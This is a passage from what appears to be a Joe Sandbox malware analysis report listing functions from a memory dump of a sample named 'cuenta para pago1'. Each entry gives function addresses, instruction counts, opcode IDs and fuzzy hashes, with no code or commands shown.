                                                                                      • Opcode ID: 3da11d14648755ed0c64ce60ec4e5dfca08023865d93b40047290ce7281fdcaa
                                                                                      • Instruction ID: eebcce5bc509a3bd792f2f17d6f551e12f2d5ff9ddf6309762bbf4db72b76705
                                                                                      • Opcode Fuzzy Hash: 3da11d14648755ed0c64ce60ec4e5dfca08023865d93b40047290ce7281fdcaa
                                                                                      • Instruction Fuzzy Hash: 4E111B71A00249DFDB44DFA9D841B9EFBF4BF08304F0482AAE518EB382E634D941CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BC2B0 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction ID: aaa2faaa551acc96b31d6d0489050429393d76af8b6bf7de7003bc1c0bc5ab05
                                                                                      • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction Fuzzy Hash: 6DF0F677341727DFFB320ADD8840B5B66A99FC5A60F16023DA599BB744CEA08C0296D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3494D4A0 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28c047d9958f5f440822065b567408cbc5ca16bf25fc983a32ec3bcb1420dca8
                                                                                      • Instruction ID: ea492224090a33a450da2bf0239ec9d11f706aedc9849ff96c5651f5eb8ba545
                                                                                      • Opcode Fuzzy Hash: 28c047d9958f5f440822065b567408cbc5ca16bf25fc983a32ec3bcb1420dca8
                                                                                      • Instruction Fuzzy Hash: AEF0FC37681680EFEE2177B8DD54F1A266ADFC5A48F51066C77521B2A0CDA5EC01C690
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3497F409 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 313a6dd1b0253400cc349e35629693b4c7c5cb09a437e9acafebddc53da1b1f9
                                                                                      • Instruction ID: 2ef50b6dd29ba0ee8dc91ed9173613c8248a748771925c4c1bac5bc5f2fd25df
                                                                                      • Opcode Fuzzy Hash: 313a6dd1b0253400cc349e35629693b4c7c5cb09a437e9acafebddc53da1b1f9
                                                                                      • Instruction Fuzzy Hash: 86F0C872B41318EFE704DBB9C805A9EB7B8EF44710F00809AF520FB2C0DA74D9018B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BC090 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9a026ef89611507c750fa20f6067d719d139fe3c68ed3b48ffc6ef52293cde4
                                                                                      • Instruction ID: a2c03bb9db8a32f6713b9ccd86f15970fb183d32b6afae3d6e7ef1edc666cb48
                                                                                      • Opcode Fuzzy Hash: d9a026ef89611507c750fa20f6067d719d139fe3c68ed3b48ffc6ef52293cde4
                                                                                      • Instruction Fuzzy Hash: 9BF0F672B44B459FF714A6098C00F5777CAD780790F20412EE944AB3E1D971DC028254
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 349932C9 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction ID: eea7420d3cd04022b2f5eb862b00cb0c7d87a8a3019fc3a47cebeee256902f34
                                                                                      • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction Fuzzy Hash: 62F04F72640204FFE7219B64CC41FDAB7FCEB08714F404566A956D7180EA70EE40CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3494C51D Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72a59ad84dc4119dd8bafd7dcd6c8c42a49da66598939cd380e0e5f63c35e6cd
                                                                                      • Instruction ID: ddfad2f4b119b7094525d4643a18859c2185da9ea731cbb756dff43eebf32a09
                                                                                      • Opcode Fuzzy Hash: 72a59ad84dc4119dd8bafd7dcd6c8c42a49da66598939cd380e0e5f63c35e6cd
                                                                                      • Instruction Fuzzy Hash: F0F04471609744DFD714DF28C545A1EB7E4EF48B14F40465EB8A8DB391EA34E900CB56
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F0774 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                      • Instruction ID: 1d65a18a5abfdb70b9c88682937292b3ab0d3942d64c2b77008df7e5f7ca049c
                                                                                      • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                      • Instruction Fuzzy Hash: 9FF0BE72611604EFE725CB25DC05B86B3E9EF9A750F24C0B89845D72A0FBB2DE01CA25
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34995149 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d2a7e2f43f5fff9783997365cf11d6edf95dc55a16081c58274bab715060fb1
                                                                                      • Instruction ID: fbc16ca6517ef48701c590c6fc966da26223b22b15e1d8c9a717e849f609bce2
                                                                                      • Opcode Fuzzy Hash: 3d2a7e2f43f5fff9783997365cf11d6edf95dc55a16081c58274bab715060fb1
                                                                                      • Instruction Fuzzy Hash: 3BF04F75A01208EFEB04DFA8D945E9EB7F8EF08304F508459B915EB381EA74EA00CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C471B Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65f357f28f41a7106cdd4d7112147e08a857ce37432f6b41adb08fecd1f793b4
                                                                                      • Instruction ID: baa95a1f88ba19ce8f360db42dd4dff96a0a82d02231924380114dd01e1e21f5
                                                                                      • Opcode Fuzzy Hash: 65f357f28f41a7106cdd4d7112147e08a857ce37432f6b41adb08fecd1f793b4
                                                                                      • Instruction Fuzzy Hash: 5CF0BEB99967AC9EF7128764C040B81F7D89B03EA0F588B6AE42A8B552C764DCC4C651
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3497F247 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc49a4cfa90ce0b2c70f7c0e7edb9aea20e8b2d2e7dbd2b5b94768c660e7d22d
                                                                                      • Instruction ID: bc6f18bf5f7d69bef74de202aad113c6412a340590d32a452a91ce7aed859819
                                                                                      • Opcode Fuzzy Hash: fc49a4cfa90ce0b2c70f7c0e7edb9aea20e8b2d2e7dbd2b5b94768c660e7d22d
                                                                                      • Instruction Fuzzy Hash: 58F06DB5A10348EFEB04DFA9C405E9EBBF8AF08304F008069E611EB281EA74D900CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348FC50D Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e8d137230567ddd817bd45a2010139f8572b4affe189b00defd7598d8175dd3
                                                                                      • Instruction ID: 2820222a404abb4f3afe326c3b7494f510806bc7c7111673d45828d683e67e64
                                                                                      • Opcode Fuzzy Hash: 3e8d137230567ddd817bd45a2010139f8572b4affe189b00defd7598d8175dd3
                                                                                      • Instruction Fuzzy Hash: D5F027F5526B90DFE31297ACE844B4177D8BB0D7A8F418B69D40587552C762FA80C284
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902539 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                      • Instruction ID: 6a854125460cb5b9152caa7ffaabc5370bb030859c36d9f535c65ddc3b3d9794
                                                                                      • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                      • Instruction Fuzzy Hash: E7E0D8723419406FE7118E599CD4F47779EDFC2710F00447DB9045F142CAE2DD0986A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3497F7CF Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 926ad7791d1f26db4f8ca6dd6027c9990022feed57722a12168ecc37fe9808ab
                                                                                      • Instruction ID: 2e162228ae2983842a1149552b0f595594164b5a7878640869489de8d89f89e7
                                                                                      • Opcode Fuzzy Hash: 926ad7791d1f26db4f8ca6dd6027c9990022feed57722a12168ecc37fe9808ab
                                                                                      • Instruction Fuzzy Hash: 4AF08271B01248EFEB04DBA9C545F9E7BF8AF08704F400098E512FB2C1E974D9008B18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3497F717 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e1b87554201efb39533e287b7436520c1569858b76af76050266921b1b762da
                                                                                      • Instruction ID: df43f0ccebd9a79da9dfffec8e0776d130aa7efcf188acade890fdbe2ac871b3
                                                                                      • Opcode Fuzzy Hash: 3e1b87554201efb39533e287b7436520c1569858b76af76050266921b1b762da
                                                                                      • Instruction Fuzzy Hash: 47F08275A05248EFEB04DBA9C945F5E7BF8AF48704F404098E611FB2C1D974D9008758
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3499505B Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a7d3d8aa9eaf0cefdf179e8018ad5ae510ebe69c22f16350bf55941d39dd1b1
                                                                                      • Instruction ID: 266f8aa0ad9246e3874c03da43c52b132859a41b11ef9d48b6bd210e59ad6fc7
                                                                                      • Opcode Fuzzy Hash: 2a7d3d8aa9eaf0cefdf179e8018ad5ae510ebe69c22f16350bf55941d39dd1b1
                                                                                      • Instruction Fuzzy Hash: 0CF08271A01248EFEB04DBB9D555E9E77F8AF08704F504498E505EB2C5EA74D9008B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F7128 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27c71536574276d7f7e7860bd2076802b0e635f14f69200afb0298a57b3700a9
                                                                                      • Instruction ID: 4809f49b3a23161b19ab40789b325dc83b5d77d10c4bba6bac558963788df26b
                                                                                      • Opcode Fuzzy Hash: 27c71536574276d7f7e7860bd2076802b0e635f14f69200afb0298a57b3700a9
                                                                                      • Instruction Fuzzy Hash: F8F0E235917654CFF711D729C244B4173DCAB027B0F0A81A4D4188B902C364D880C290
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3497F2AE Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b12e6ea9608fb16a1e57c1633dc855419bc745fc0d45c8c3d0ea2fe11e4c8eee
                                                                                      • Instruction ID: f0321d02df6ffb76aa4fe95274b7e455ac17506ff9fdf8519a7fbb57017cf67e
                                                                                      • Opcode Fuzzy Hash: b12e6ea9608fb16a1e57c1633dc855419bc745fc0d45c8c3d0ea2fe11e4c8eee
                                                                                      • Instruction Fuzzy Hash: 97F08271A01248EFEB04DBA9C45AF5E7BF8EF08704F504098E611FB2C1D974D901CB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F174A Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2c6cdbd4706dbd20a553cbd611e9e01ca4610d139b8eb90dbfd8c0ca2377129
                                                                                      • Instruction ID: 8b06ea1d33a587122920a708a991e3cd2be7e3a7f74bbf1d9d2573c722414b7d
                                                                                      • Opcode Fuzzy Hash: b2c6cdbd4706dbd20a553cbd611e9e01ca4610d139b8eb90dbfd8c0ca2377129
                                                                                      • Instruction Fuzzy Hash: 2AE09272742821AFE2519A18AC00F66739DEFD4661F194539E504D7214DB29DD02C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C0630 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction ID: 28de73f9f608ad8c5543ffb0fed6925a0d288684ec54f6913503f0601e07b5b9
                                                                                      • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction Fuzzy Hash: 56F0ED7A204348DFEB05CF55C040E85BBE8AB863A0F000096FC898B301DB71FC81CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C2500 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0c40e00996542f6dbc14acc48547f83e2cbed75184eda858302675a8c23ac82
                                                                                      • Instruction ID: b463a1abe04b98b1c605a907736d298add07d80c25b91cab6c56fd9620eece14
                                                                                      • Opcode Fuzzy Hash: e0c40e00996542f6dbc14acc48547f83e2cbed75184eda858302675a8c23ac82
                                                                                      • Instruction Fuzzy Hash: 66E09233100654DFD721EB28CC11F9BBBA9EF50360F004618F166571A1CA70ED10CBC4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B81EB Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction ID: 1f229c565e41dfe8457541258d2df6fcbc790d9c1f45d9006073f1b9f07f4fac
                                                                                      • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction Fuzzy Hash: 86E0C232142718EFFB312B24DC00F4276A9FF04750F204A6AF0C60A2A08FB49C81DE48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BB502 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction ID: 4b16be7ee5cbccba1650c4f3fbc1a7e8e57b82745b95869334238fc14aa2474e
                                                                                      • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction Fuzzy Hash: C0D05E32051610EEEB326F28ED05F937AB5AF40B10F050A28B191169F486E1ED84C6A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348FE4BC Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                      • Instruction ID: 78ec77385917c566dd2c36abfb1a9c0430c33bee6c737d2574d1dfc2c8883149
                                                                                      • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
